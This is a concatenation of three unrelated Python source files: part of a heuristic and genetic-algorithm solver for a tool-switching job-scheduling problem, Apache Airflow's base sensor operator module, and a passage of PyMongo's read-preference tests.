self.onIterate()
self.onEvaluateNeighborhood()
neighborhood=neighborhood_generator_function(job_sequence)
for new_job_sequence in neighborhood:
evaluations+=1
if evaluations>max_evaluations:
break
_, y = self.minimizeSwitchesForJobSequence(new_job_sequence)
T=start_T - start_T * (float(k)/float(iterations))
if acceptance_probability(x,y,T) >= random.uniform(0,1):
job_sequence=new_job_sequence
#print(y,y<x,T,self.stats["total_objective_evaluations"])
x=y
if x < best_switches:
self.onNewBest(x)
best_switches=x
best_sequence = job_sequence
break
if evaluations>max_evaluations:
break
return best_sequence
########################################################################################################################
#
# Experimental Heuristics
#
########################################################################################################################
def bestJobSequenceGreedyClusteringAllVNS(self,cycle):
sequences=self.constructJobSequencesGreedyJobClustering()
best_job_sequence = sequences[0]
_,best_switches=self.minimizeSwitchesForJobSequence(best_job_sequence)
best_job_sequence, best_switches = self.bestJobSequenceVariableNeighborhoodSearch(best_job_sequence, cycle)
for job_sequence in sequences:
self.onIterate()
_,switches=self.minimizeSwitchesForJobSequence(job_sequence)
job_sequence, switches = self.bestJobSequenceVariableNeighborhoodSearch(job_sequence, cycle)
if switches < best_switches:
best_job_sequence=job_sequence
best_switches=switches
self.onNewBest(best_switches)
return best_job_sequence
def bestJobSequenceLocalDecreasingSlices(self,job_sequence,iterations=100):
""" Experimental!
(Exercise 3)
"""
last_improved_size=len(job_sequence)/2
for i in range(iterations):
self.onIterate()
while True:
slice_size=last_improved_size
improved = False
depth=0
while not improved and slice_size >= 1:
self.onEvaluateNeighborhood()
neighborhood=singleSliceSwapNeighborhood(job_sequence,slice_size)
job_sequence,min_switches,improved=self.nextBestJobSequence(job_sequence,neighborhood)
slice_size -= 1
if not improved:
slice_size=len(job_sequence)/2
break
else:
last_improved_size=slice_size
self.onNewBest(min_switches)
return job_sequence,min_switches
def bestJobSequenceMultipleSimulatedAnnealing(self,neighborhood_generator_function,total_iterations=1000):
solutions=[]
solutions.append(self.constructJobSequenceGreedy())
solutions.extend(self.constructJobSequencesGreedyJobClustering())
for i in range(5):
solutions.append(self.constructJobSequenceGreedyRandomized())
for i in range(10):
solutions.append(self.constructJobSequenceRandom())
best_solution=solutions[0]
_, best_switches = self.minimizeSwitchesForJobSequence(best_solution)
while len(solutions) > 1:
iterations = total_iterations / len(solutions)
#print("%d solutions in pool."%len(solutions))
#print("%d iterations allocated for each."%iterations)
for i, sequence in enumerate(solutions):
#print("\tOptimizing %d of %d"%(i,len(solutions)))
solutions[i] = self.bestJobSequenceSimulatedAnnealing(sequence,neighborhood_generator_function,iterations)
def rateSolution(k):
_, switches = self.minimizeSwitchesForJobSequence(k)
return switches
solutions=sorted(solutions,key=rateSolution,reverse=False)
new_solutions=[]
for i in range(int((0.5+len(solutions))/2)):
new_solutions.append(solutions[i])
#print("OLD",[rateSolution(i) for i in solutions])
#print("NEW",[rateSolution(i) for i in new_solutions])
solutions=new_solutions
iterations = total_iterations / len(solutions)
solutions[0] = self.bestJobSequenceSimulatedAnnealing(sequence,neighborhood_generator_function,iterations)
return solutions[0]
def bestJobSequenceVariableNeighborhoodSimulatedAnnealing(self,job_sequence,neighborhood_generator_function_cycle, iterations=1000):
"""
"""
def sanneal(seq,neigh,iters):
_,old_min_switches=self.minimizeSwitchesForJobSequence(seq)
new_seq = self.bestJobSequenceSimulatedAnnealing(seq,neigh,iters)
_,new_min_switches=self.minimizeSwitchesForJobSequence(new_seq)
return new_seq,new_min_switches,(new_min_switches<old_min_switches)
improved = True
while improved:
#print("")
self.onIterate()
for i in range(len(neighborhood_generator_function_cycle)):
self.onEvaluateNeighborhood()
neighborhood_generator_function=neighborhood_generator_function_cycle[i]
#print(" "*i + neighborhood_generator_function.__name__ )
neighborhood=neighborhood_generator_function(job_sequence)
job_sequence,min_switches,improved=sanneal(job_sequence,neighborhood_generator_function,iterations)
if improved:
#print(" " *i + "New minimum: %d @ %d evals"%(min_switches,self.stats["total_objective_evaluations"]))
self.onNewBest(min_switches)
break
else:
#Swap the neighborhood to the end of the cycle, because it may not perform well in the current function area
pass
return job_sequence,min_switches
########################################################################################################################
#
# Utility, Output, Statistics and Debugging
#
########################################################################################################################
def loadFromFile(self,filename): #TODO: File format sanity checks.
"""Expects data format according to http://www.unet.edu.ve/~jedgar/ToSP/ToSP.htm"""
lines=open(filename,"r").readlines()
self.n=len(lines)
self.m=-1
jobs={}
for line in lines:
parts=line.replace("#","").split(":")
j=int(parts[0]) #Extract job index
jobs[j]=set([int(i) for i in parts[1].split(",")]) #Extract tools
self.m=max(self.m,max(jobs[j])+1) #Update problem tool count
#Construct the incidence matrix.
self.A=[[1 if t in jobs[j] else 0 for t in range(self.m)] for j in range(self.n)]
def setLogFile(self,filename):
self.log = open(filename,"w")
self.writeLog("iteration,objective_value")
def closeLogFile(self):
self.log.close()
def writeLog(self,msg):
if self.log != None:
self.log.write(msg+"\n")
if self.console_output:
print(msg)
def onEvaluateObjectiveFunction(self):
self.stats["total_objective_evaluations"]+=1
self.stats["objective_evaluations_since_last_improvement"]+=1
def onEvaluateNeighborhood(self):
self.stats["total_neighborhoods"]+=1
def onIterate(self):
self.stats["total_iterations"]+=1
def onNewBest(self,objective_value):
if objective_value < self.stats["best_objective_value"] or self.stats["best_objective_value"]==-1:
self.stats["total_improvements"]+=1
self.stats["objective_evaluations_since_last_improvement"]=0
self.stats["best_objective_value"]=objective_value
self.writeLog("%d,%d"%(self.stats["total_iterations"],objective_value))
def writeReport(self,best_job_sequence):
tool_sequence, min_switches = self.minimizeSwitchesForJobSequence(best_job_sequence)
self.writeLog("=======================================================================================================")
self.debugVerifySolution(best_job_sequence,tool_sequence)
self.writeLog("Solution passed logic verification.")
self.writeLog("")
self.writeLog("Tool sequence:")
st=0
for i,tool_set in enumerate(tool_sequence):
swaps=0
if i>=1:
swaps=len(tool_set)-len(tool_set.intersection(tool_sequence[i-1]))
st+=swaps
self.writeLog("(%2d switches) [%s]" % (swaps,",".join(["%2d"%i for i in sorted([i for i in tool_set])]),))
self.writeLog("")
self.writeLog("Job sequence:\n[%s]" % ",".join([str(i) for i in best_job_sequence]))
self.writeLog("=======================================================================================================")
self.writeLog("Objective value: %d"%min_switches)
self.writeLog("Total objective evaluations: %d"%(self.stats["total_objective_evaluations"]-1))
self.writeLog("Wasted objective evaluations: %d"%(self.stats["objective_evaluations_since_last_improvement"]-1))
self.writeLog("Total iterations: %d"%self.stats["total_iterations"])
self.writeLog("Total neighborhoods: %d"%self.stats["total_neighborhoods"])
self.writeLog("Total improvements: %d"%self.stats["total_improvements"])
def debugBestSequenceExhaustive(self):
start=self.constructJobSequenceLinear()
best_sequence=start
_,best_switches=self.minimizeSwitchesForJobSequence(start)
for permutation in itertools.permutations(start):
_,switches=self.minimizeSwitchesForJobSequence(permutation)
if switches<best_switches:
best_switches=switches
best_sequence=permutation
return best_sequence
def debugVerifyJobSequence(self,job_sequence):
if set(job_sequence) != set([i for i in range(self.n)]) or len(job_sequence) != self.n:
raise
def debugVerifySolution(self,job_sequence,tool_sequence):
i=0
self.debugVerifyJobSequence(job_sequence)
for j in job_sequence:
needed=self.getToolsForJob(j)
for t in needed:
if not t in tool_sequence[i]:
raise
if len(tool_sequence[i])>self.C:
raise
i+=1
########################################################################################################################
#
# Experimental: Genetic Algorithm
#
########################################################################################################################
class Individual:
def __init__(self,seq):
self.sequence=seq
sequence=[]
objective_value=0
distance_sum=0
objective_score=0
distance_score=0
def distance(self,other):
dist=0
for i in range(len(self.sequence)):
if self.sequence[i]!=other.sequence[i]:
dist+=1
return dist
class HeuristicSolverGenetic(HeuristicSolver):
population=[]
population_size_max = 300
mutation_rate = 0.15
reproduction_rate = 0.9
def seed(self,n):
for i in range(n):
self.population.append(Individual(self.constructJobSequenceRandom()))
def iterate(self):
self.computeScores()
print("%d best score in %d"%(self.getBest().objective_value,len(self.population)))
print("%f avg. objective"%(sum([i.objective_value for i in self.population])/float(len(self.population))))
reproduction_distribution = self.buildReproductionDistribution()
offspring = []
for i in range(int(len(self.population)*self.reproduction_rate)):
a = self.select(reproduction_distribution)
b=a
while a==b:
b = self.select(reproduction_distribution)
offspring.append(Individual(self.recombine(self.population[a].sequence,self.population[b].sequence)))
print("%d offspring"%len(offspring))
if len(self.population)+len(offspring) > self.population_size_max:
death_distribution = self.buildDeathDistribution()
must_die = len(self.population)+len(offspring) - self.population_size_max
dying = set()
while len(dying) < must_die:
dying.add(self.select(death_distribution))
new_population = []
for i, individual in enumerate(self.population):
if not i in dying:
new_population.append(individual)
print("%d died"%(len(self.population)-len(new_population)))
self.population = new_population
self.population.extend(offspring)
for i in range(int(len(self.population)*self.mutation_rate)):
index = random.randrange(0,len(self.population)-1)
self.population[index].sequence = self.mutate(self.population[index].sequence)
print("%d mutations"%(int(len(self.population)*self.mutation_rate)))
print("")
def getBest(self):
best_individual=self.population[0]
best_objective=best_individual.objective_value
for individual in self.population:
if individual.objective_value < best_objective:
best_objective = individual.objective_value
best_individual = individual
return best_individual
def fastForward(self):
#Simulated annealing for all
pass
def computeScores(self):
total_objective_sum = 0
total_distance_sum = 0
for individual in self.population:
_,individual.objective_value=self.minimizeSwitchesForJobSequence(individual.sequence)
individual.distance_sum=0
for other in self.population:
individual.distance_sum+=individual.distance(other)
total_objective_sum+=individual.objective_value
total_distance_sum+=individual.distance_sum
avg_objective = total_objective_sum / float(len(self.population))
avg_distance_sum = total_distance_sum / float(len(self.population))
for individual in self.population:
individual.objective_score = 1 / ( float(individual.objective_value**2) / avg_objective**2)
individual.distance_score = float(individual.distance_sum) / avg_distance_sum
individual.score = (3*individual.objective_score+individual.distance_score)/4.0
individual.p_reproduce = (1.0/len(self.population)) * individual.score
individual.p_death = (1.0/len(self.population)) * (1.0/individual.score)
#print(individual.objective_value,individual.score)
def buildReproductionDistribution(self):
distribution=[]
value=0
for i,individual in enumerate(self.population):
distribution.append( (value,value+individual.p_reproduce,i) )
value+=individual.p_reproduce
return distribution
def buildDeathDistribution(self):
distribution=[]
value=0
for i,individual in enumerate(self.population):
distribution.append( (value,value+individual.p_death,i) )
value+=individual.p_death
return distribution
def select(self,distribution):
r = random.uniform(0,1)
for start,end,index in distribution:
if r>=start and r<end:
return index
return random.randrange(0,len(self.population)-1)
def recombine(self,sequence_a,sequence_b,initial_interchange_size=None):
#Find largest pair of portions that can be interchanged
if initial_interchange_size==None:
interchange_size = len(sequence_a)/2
else:
interchange_size = initial_interchange_size
found=False
while not found and interchange_size > 2:
interchange_size -= 1
for i in range(0,len(sequence_a)-interchange_size):
for j in range(0,len(sequence_b)-interchange_size):
set_a=set(sequence_a[i:i+interchange_size])
set_b=set(sequence_b[j:j+interchange_size])
if set_a==set_b:
found=True
interchange_locus_a=i
interchange_locus_b=j
break
if found:
break
if not found:
return sequence_a
new_sequence=copy.deepcopy(sequence_a)
new_sequence[interchange_locus_a:interchange_locus_a+interchange_size]=copy.deepcopy(sequence_b[interchange_locus_b:interchange_locus_b+interchange_size])
if interchange_size > 3:
return self.recombine(new_sequence,sequence_b,interchange_size-1)
else:
return new_sequence
def mutate(self,sequence):
for new_sequence in singleRandomSwapNeighborhood(sequence):
return new_sequence
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import hashlib
import os
import time
from datetime import timedelta
from typing import Any, Callable, Dict, Iterable
from airflow.configuration import conf
from airflow.exceptions import (
AirflowException,
AirflowRescheduleException,
AirflowSensorTimeout,
AirflowSkipException,
)
from airflow.models import BaseOperator, SensorInstance
from airflow.models.skipmixin import SkipMixin
from airflow.models.taskreschedule import TaskReschedule
from airflow.ti_deps.deps.ready_to_reschedule import ReadyToRescheduleDep
from airflow.utils import timezone
# We need to keep the import here because GCSToLocalFilesystemOperator released in
# Google Provider before 3.0.0 imported apply_defaults from here.
# See https://github.com/apache/airflow/issues/16035
from airflow.utils.decorators import apply_defaults
class BaseSensorOperator(BaseOperator, SkipMixin):
"""
Sensor operators are derived from this class and inherit these attributes.
Sensor operators keep executing at a time interval and succeed when
a criteria is met and fail if and when they time out.
:param soft_fail: Set to true to mark the task as SKIPPED on failure
:type soft_fail: bool
:param poke_interval: Time in seconds that the job should wait in
between each tries
:type poke_interval: float
:param timeout: Time, in seconds before the task times out and fails.
:type timeout: float
:param mode: How the sensor operates.
Options are: ``{ poke | reschedule }``, default is ``poke``.
When set to ``poke`` the sensor is taking up a worker slot for its
whole execution time and sleeps between pokes. Use this mode if the
expected runtime of the sensor is short or if a short poke interval
is required. Note that the sensor will hold onto a worker slot and
a pool slot for the duration of the sensor's runtime in this mode.
When set to ``reschedule`` the sensor task frees the worker slot when
the criteria is not yet met and it's rescheduled at a later time. Use
this mode if the time before the criteria is met is expected to be
quite long. The poke interval should be more than one minute to
prevent too much load on the scheduler.
:type mode: str
:param exponential_backoff: allow progressive longer waits between
pokes by using exponential backoff algorithm
:type exponential_backoff: bool
"""
ui_color = '#e6f1f2' # type: str
valid_modes = ['poke', 'reschedule'] # type: Iterable[str]
# As the poke context in smart sensor defines the poking job signature only,
# The execution_fields defines other execution details
# for this tasks such as the customer defined timeout, the email and the alert
# setup. Smart sensor serialize these attributes into a different DB column so
# that smart sensor service is able to handle corresponding execution details
# without breaking the sensor poking logic with dedup.
execution_fields = (
'poke_interval',
'retries',
'execution_timeout',
'timeout',
'email',
'email_on_retry',
'email_on_failure',
)
def __init__(
self,
*,
poke_interval: float = 60,
timeout: float = conf.getfloat('sensors', 'default_timeout'),
soft_fail: bool = False,
mode: str = 'poke',
exponential_backoff: bool = False,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.poke_interval = poke_interval
self.soft_fail = soft_fail
self.timeout = timeout
self.mode = mode
self.exponential_backoff = exponential_backoff
self._validate_input_values()
self.sensor_service_enabled = conf.getboolean('smart_sensor', 'use_smart_sensor')
self.sensors_support_sensor_service = set(
map(lambda l: l.strip(), conf.get('smart_sensor', 'sensors_enabled').split(','))
)
def _validate_input_values(self) -> None:
if not isinstance(self.poke_interval, (int, float)) or self.poke_interval < 0:
raise AirflowException("The poke_interval must be a non-negative number")
if not isinstance(self.timeout, (int, float)) or self.timeout < 0:
raise AirflowException("The timeout must be a non-negative number")
if self.mode not in self.valid_modes:
raise AirflowException(
f"The mode must be one of {self.valid_modes},'{self.dag.dag_id if self.has_dag() else ''}.{self.task_id}'; received '{self.mode}'."
)
def poke(self, context: Dict) -> bool:
"""
Function that the sensors defined while deriving this class should
override.
"""
raise AirflowException('Override me.')
def is_smart_sensor_compatible(self):
check_list = [
not self.sensor_service_enabled,
self.on_success_callback,
self.on_retry_callback,
self.on_failure_callback,
]
for status in check_list:
if status:
return False
operator = self.__class__.__name__
return operator in self.sensors_support_sensor_service
def register_in_sensor_service(self, ti, context):
"""
Register ti in smart sensor service
:param ti: Task instance object.
:param context: TaskInstance template context from the ti.
:return: boolean
"""
poke_context = self.get_poke_context(context)
execution_context = self.get_execution_context(context)
return SensorInstance.register(ti, poke_context, execution_context)
def get_poke_context(self, context):
"""
Return a dictionary with all attributes in poke_context_fields. The
poke_context with operator class can be used to identify a unique
sensor job.
:param context: TaskInstance template context.
:return: A dictionary with key in poke_context_fields.
"""
if not context:
self.log.info("Function get_poke_context doesn't have a context input.")
poke_context_fields = getattr(self.__class__, "poke_context_fields", None)
result = {key: getattr(self, key, None) for key in poke_context_fields}
return result
def get_execution_context(self, context):
"""
Return a dictionary with all attributes in execution_fields. The
execution_context include execution requirement for each sensor task
such as timeout setup, email_alert setup.
:param context: TaskInstance template context.
:return: A dictionary with key in execution_fields.
"""
if not context:
self.log.info("Function get_execution_context doesn't have a context input.")
execution_fields = self.__class__.execution_fields
result = {key: getattr(self, key, None) for key in execution_fields}
if result['execution_timeout'] and isinstance(result['execution_timeout'], datetime.timedelta):
result['execution_timeout'] = result['execution_timeout'].total_seconds()
return result
def execute(self, context: Dict) -> Any:
started_at = None
if self.reschedule:
# If reschedule, use the start date of the first try (first try can be either the very
# first execution of the task, or the first execution after the task was cleared.)
first_try_number = context['ti'].max_tries - self.retries + 1
task_reschedules = TaskReschedule.find_for_task_instance(
context['ti'], try_number=first_try_number
)
if task_reschedules:
started_at = task_reschedules[0].start_date
else:
started_at = timezone.utcnow()
def run_duration() -> float:
# If we are in reschedule mode, then we have to compute diff
# based on the time in a DB, so can't use time.monotonic
nonlocal started_at
return (timezone.utcnow() - started_at).total_seconds()
else:
started_at = time.monotonic()
def run_duration() -> float:
nonlocal started_at
return time.monotonic() - started_at
try_number = 1
log_dag_id = self.dag.dag_id if self.has_dag() else ""
while not self.poke(context):
if run_duration() > self.timeout:
# If sensor is in soft fail mode but times out raise AirflowSkipException.
if self.soft_fail:
raise AirflowSkipException(f"Snap. Time is OUT. DAG id: {log_dag_id}")
else:
raise AirflowSensorTimeout(f"Snap. Time is OUT. DAG id: {log_dag_id}")
if self.reschedule:
reschedule_date = timezone.utcnow() + timedelta(
seconds=self._get_next_poke_interval(started_at, run_duration, try_number)
)
raise AirflowRescheduleException(reschedule_date)
else:
time.sleep(self._get_next_poke_interval(started_at, run_duration, try_number))
try_number += 1
self.log.info("Success criteria met. Exiting.")
def _get_next_poke_interval(self, started_at: Any, run_duration: Callable[[], int], try_number):
"""Using the similar logic which is used for exponential backoff retry delay for operators."""
if self.exponential_backoff:
min_backoff = int(self.poke_interval * (2 ** (try_number - 2)))
run_hash = int(
hashlib.sha1(f"{self.dag_id}#{self.task_id}#{started_at}#{try_number}".encode()).hexdigest(),
16,
)
modded_hash = min_backoff + run_hash % min_backoff
delay_backoff_in_seconds = min(modded_hash, timedelta.max.total_seconds() - 1)
new_interval = min(self.timeout - int(run_duration()), delay_backoff_in_seconds)
self.log.info("new %s interval is %s", self.mode, new_interval)
return new_interval
else:
return self.poke_interval
def prepare_for_execution(self) -> BaseOperator:
task = super().prepare_for_execution()
# Sensors in `poke` mode can block execution of DAGs when running
# with single process executor, thus we change the mode to`reschedule`
# to allow parallel task being scheduled and executed
if conf.get('core', 'executor') == "DebugExecutor":
self.log.warning("DebugExecutor changes sensor mode to 'reschedule'.")
task.mode = 'reschedule'
return task
@property
def reschedule(self):
"""Define mode rescheduled sensors."""
return self.mode == 'reschedule'
@property
def deps(self):
"""
Adds one additional dependency for all sensor operators that
checks if a sensor task instance can be rescheduled.
"""
if self.reschedule:
return super().deps | {ReadyToRescheduleDep()}
return super().deps
def poke_mode_only(cls):
"""
Class Decorator for child classes of BaseSensorOperator to indicate
that instances of this class are only safe to use poke mode.
Will decorate all methods in the class to assert they did not change
the mode from 'poke'.
:param cls: BaseSensor class to enforce methods only use 'poke' mode.
:type cls: type
"""
def decorate(cls_type):
def mode_getter(_):
return 'poke'
def mode_setter(_, value):
if value != 'poke':
raise ValueError("cannot set mode to 'poke'.")
if not issubclass(cls_type, BaseSensorOperator):
raise ValueError(
f"poke_mode_only decorator should only be "
f"applied to subclasses of BaseSensorOperator,"
f" got:{cls_type}."
)
cls_type.mode = property(mode_getter, mode_setter)
return cls_type
return decorate(cls)
if 'BUILDING_AIRFLOW_DOCS' in os.environ:
# flake8: noqa: F811
# Monkey patch hook to get good function headers while building docs
apply_defaults = lambda x: x
| |
# Copyright 2011-2016 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the replica_set_connection module."""
import contextlib
import copy
import random
import sys
import pickle
sys.path[0:0] = [""]
from bson.py3compat import MAXSIZE
from bson.son import SON
from pymongo.errors import ConfigurationError, OperationFailure
from pymongo.message import _maybe_add_read_preference
from pymongo.mongo_client import MongoClient
from pymongo.read_preferences import (ReadPreference, MovingAverage,
Primary, PrimaryPreferred,
Secondary, SecondaryPreferred,
Nearest)
from pymongo.server_description import ServerDescription
from pymongo.server_selectors import readable_server_selector, Selection
from pymongo.server_type import SERVER_TYPE
from pymongo.write_concern import WriteConcern
from test.test_replica_set_client import TestReplicaSetClientBase
from test import (SkipTest,
client_context,
unittest,
db_user,
db_pwd)
from test.utils import connected, single_client, one, wait_until, rs_client
from test.version import Version
class TestSelections(unittest.TestCase):
@client_context.require_connection
def test_bool(self):
client = single_client()
wait_until(lambda: client.address, "discover primary")
selection = Selection.from_topology_description(
client._topology.description)
self.assertTrue(selection)
self.assertFalse(selection.with_server_descriptions([]))
class TestReadPreferenceObjects(unittest.TestCase):
prefs = [Primary(),
Secondary(),
Nearest(tag_sets=[{'a': 1}, {'b': 2}]),
SecondaryPreferred(max_staleness=30)]
def test_pickle(self):
for pref in self.prefs:
self.assertEqual(pref, pickle.loads(pickle.dumps(pref)))
def test_copy(self):
for pref in self.prefs:
self.assertEqual(pref, copy.copy(pref))
class TestReadPreferencesBase(TestReplicaSetClientBase):
@classmethod
@client_context.require_secondaries_count(1)
def setUpClass(cls):
super(TestReadPreferencesBase, cls).setUpClass()
def setUp(self):
super(TestReadPreferencesBase, self).setUp()
# Insert some data so we can use cursors in read_from_which_host
self.client.pymongo_test.test.drop()
self.client.get_database(
"pymongo_test",
write_concern=WriteConcern(w=self.w)).test.insert_many(
[{'_id': i} for i in range(10)])
self.addCleanup(self.client.pymongo_test.test.drop)
def read_from_which_host(self, client):
"""Do a find() on the client and return which host was used
"""
cursor = client.pymongo_test.test.find()
next(cursor)
return cursor.address
def read_from_which_kind(self, client):
"""Do a find() on the client and return 'primary' or 'secondary'
depending on which the client used.
"""
address = self.read_from_which_host(client)
if address == client.primary:
return 'primary'
elif address in client.secondaries:
return 'secondary'
else:
self.fail(
'Cursor used address %s, expected either primary '
'%s or secondaries %s' % (
address, client.primary, client.secondaries))
def assertReadsFrom(self, expected, **kwargs):
c = rs_client(**kwargs)
wait_until(
lambda: len(c.nodes - c.arbiters) == self.w,
"discovered all nodes")
used = self.read_from_which_kind(c)
self.assertEqual(expected, used, 'Cursor used %s, expected %s' % (
used, expected))
class TestSingleSlaveOk(TestReadPreferencesBase):
def test_reads_from_secondary(self):
host, port = next(iter(self.client.secondaries))
# Direct connection to a secondary.
client = single_client(host, port)
self.assertFalse(client.is_primary)
# Regardless of read preference, we should be able to do
# "reads" with a direct connection to a secondary.
# See server-selection.rst#topology-type-single.
self.assertEqual(client.read_preference, ReadPreference.PRIMARY)
db = client.pymongo_test
coll = db.test
# Test find and find_one.
self.assertIsNotNone(coll.find_one())
self.assertEqual(10, len(list(coll.find())))
# Test some database helpers.
self.assertIsNotNone(db.collection_names())
self.assertIsNotNone(db.validate_collection("test"))
self.assertIsNotNone(db.command("count", "test"))
# Test some collection helpers.
self.assertEqual(10, coll.count())
self.assertEqual(10, len(coll.distinct("_id")))
self.assertIsNotNone(coll.aggregate([]))
self.assertIsNotNone(coll.index_information())
# Test some "magic" namespace helpers.
self.assertIsNotNone(db.current_op())
class TestReadPreferences(TestReadPreferencesBase):
def test_mode_validation(self):
for mode in (ReadPreference.PRIMARY,
ReadPreference.PRIMARY_PREFERRED,
ReadPreference.SECONDARY,
ReadPreference.SECONDARY_PREFERRED,
ReadPreference.NEAREST):
self.assertEqual(
mode,
rs_client(read_preference=mode).read_preference)
self.assertRaises(
TypeError,
rs_client, read_preference='foo')
def test_tag_sets_validation(self):
S = Secondary(tag_sets=[{}])
self.assertEqual(
[{}],
rs_client(read_preference=S).read_preference.tag_sets)
S = Secondary(tag_sets=[{'k': 'v'}])
self.assertEqual(
[{'k': 'v'}],
rs_client(read_preference=S).read_preference.tag_sets)
S = Secondary(tag_sets=[{'k': 'v'}, {}])
self.assertEqual(
[{'k': 'v'}, {}],
rs_client(read_preference=S).read_preference.tag_sets)
self.assertRaises(ValueError, Secondary, tag_sets=[])
# One dict not ok, must be a list of dicts
self.assertRaises(TypeError, Secondary, tag_sets={'k': 'v'})
self.assertRaises(TypeError, Secondary, tag_sets='foo')
self.assertRaises(TypeError, Secondary, tag_sets=['foo'])
def test_threshold_validation(self):
self.assertEqual(17, rs_client(
localThresholdMS=17
).local_threshold_ms)
self.assertEqual(42, rs_client(
localThresholdMS=42
).local_threshold_ms)
self.assertEqual(666, rs_client(
localthresholdms=666
).local_threshold_ms)
self.assertEqual(0, rs_client(
localthresholdms=0
).local_threshold_ms)
self.assertRaises(ValueError,
rs_client,
localthresholdms=-1)
def test_zero_latency(self):
ping_times = set()
# Generate unique ping times.
while len(ping_times) < len(self.client.nodes):
ping_times.add(random.random())
for ping_time, host in zip(ping_times, self.client.nodes):
ServerDescription._host_to_round_trip_time[host] = ping_time
try:
client = connected(
rs_client(readPreference='nearest', localThresholdMS=0))
wait_until(
lambda: client.nodes == self.client.nodes,
"discovered all nodes")
host = self.read_from_which_host(client)
for _ in range(5):
self.assertEqual(host, self.read_from_which_host(client))
finally:
ServerDescription._host_to_round_trip_time.clear()
def test_primary(self):
self.assertReadsFrom(
'primary', read_preference=ReadPreference.PRIMARY)
def test_primary_with_tags(self):
# Tags not allowed with PRIMARY
self.assertRaises(
ConfigurationError,
rs_client, tag_sets=[{'dc': 'ny'}])
def test_primary_preferred(self):
self.assertReadsFrom(
'primary', read_preference=ReadPreference.PRIMARY_PREFERRED)
def test_secondary(self):
self.assertReadsFrom(
'secondary', read_preference=ReadPreference.SECONDARY)
def test_secondary_preferred(self):
self.assertReadsFrom(
'secondary', read_preference=ReadPreference.SECONDARY_PREFERRED)
def test_nearest(self):
# With high localThresholdMS, expect to read from any
# member
c = rs_client(
read_preference=ReadPreference.NEAREST,
localThresholdMS=10000) # 10 seconds
data_members = set(self.hosts).difference(set(self.arbiters))
# This is a probabilistic test; track which members we've read from so
# far, and keep reading until we've used all the members or give up.
# Chance of using only 2 of 3 members 10k times if there's no bug =
# 3 * (2/3)**10000, very low.
used = set()
i = 0
while data_members.difference(used) and i < 10000:
address = self.read_from_which_host(c)
used.add(address)
i += 1
not_used = data_members.difference(used)
latencies = ', '.join(
'%s: %dms' % (server.description.address,
server.description.round_trip_time)
for server in c._get_topology().select_servers(
readable_server_selector))
self.assertFalse(
not_used,
"Expected to use primary and all secondaries for mode NEAREST,"
" but didn't use %s\nlatencies: %s" % (not_used, latencies))
class ReadPrefTester(MongoClient):
def __init__(self, *args, **kwargs):
self.has_read_from = set()
client_options = client_context.ssl_client_options.copy()
client_options.update(kwargs)
super(ReadPrefTester, self).__init__(*args, **client_options)
@contextlib.contextmanager
def _socket_for_reads(self, read_preference):
context = super(ReadPrefTester, self)._socket_for_reads(read_preference)
with context as (sock_info, slave_ok):
self.record_a_read(sock_info.address)
yield sock_info, slave_ok
def record_a_read(self, address):
server = self._get_topology().select_server_by_address(address, 0)
self.has_read_from.add(server)
_PREF_MAP = [
(Primary, SERVER_TYPE.RSPrimary),
(PrimaryPreferred, SERVER_TYPE.RSPrimary),
(Secondary, SERVER_TYPE.RSSecondary),
(SecondaryPreferred, SERVER_TYPE.RSSecondary),
(Nearest, 'any')
]
class TestCommandAndReadPreference(TestReplicaSetClientBase):
@classmethod
@client_context.require_secondaries_count(1)
def setUpClass(cls):
super(TestCommandAndReadPreference, cls).setUpClass()
cls.c = ReadPrefTester(
client_context.pair,
replicaSet=cls.name,
# Ignore round trip times, to test ReadPreference modes only.
localThresholdMS=1000*1000)
if client_context.auth_enabled:
cls.c.admin.authenticate(db_user, db_pwd)
cls.client_version = Version.from_client(cls.c)
# mapReduce and group fail with no collection
coll = cls.c.pymongo_test.get_collection(
'test', write_concern=WriteConcern(w=cls.w))
coll.insert_one({})
@classmethod
def tearDownClass(cls):
cls.c.drop_database('pymongo_test')
def executed_on_which_server(self, client, fn, *args, **kwargs):
"""Execute fn(*args, **kwargs) and return the Server instance used."""
client.has_read_from.clear()
fn(*args, **kwargs)
self.assertEqual(1, len(client.has_read_from))
return one(client.has_read_from)
def assertExecutedOn(self, server_type, client, fn, *args, **kwargs):
server = self.executed_on_which_server(client, fn, *args, **kwargs)
self.assertEqual(SERVER_TYPE._fields[server_type],
SERVER_TYPE._fields[server.description.server_type])
def _test_fn(self, server_type, fn):
for _ in range(10):
if server_type == 'any':
used = set()
for _ in range(1000):
server = self.executed_on_which_server(self.c, fn)
used.add(server.description.address)
if len(used) == len(self.c.secondaries) + 1:
# Success
break
unused = self.c.secondaries.union(
set([self.c.primary])
).difference(used)
if unused:
self.fail(
"Some members not used for NEAREST: %s" % (
unused))
else:
self.assertExecutedOn(server_type, self.c, fn)
def _test_primary_helper(self, func):
# Helpers that ignore read preference.
self._test_fn(SERVER_TYPE.RSPrimary, func)
def _test_coll_helper(self, secondary_ok, coll, meth, *args, **kwargs):
for mode, server_type in _PREF_MAP:
new_coll = coll.with_options(read_preference=mode())
func = lambda: getattr(new_coll, meth)(*args, **kwargs)
if secondary_ok:
self._test_fn(server_type, func)
else:
self._test_fn(SERVER_TYPE.RSPrimary, func)
def test_command(self):
# Test that the generic command helper obeys the read preference
# passed to it.
for mode, server_type in _PREF_MAP:
func = lambda: self.c.pymongo_test.command('dbStats',
read_preference=mode())
self._test_fn(server_type, func)
def test_create_collection(self):
# Collections should be created on primary, obviously
self._test_primary_helper(
lambda: self.c.pymongo_test.create_collection(
'some_collection%s' % random.randint(0, MAXSIZE)))
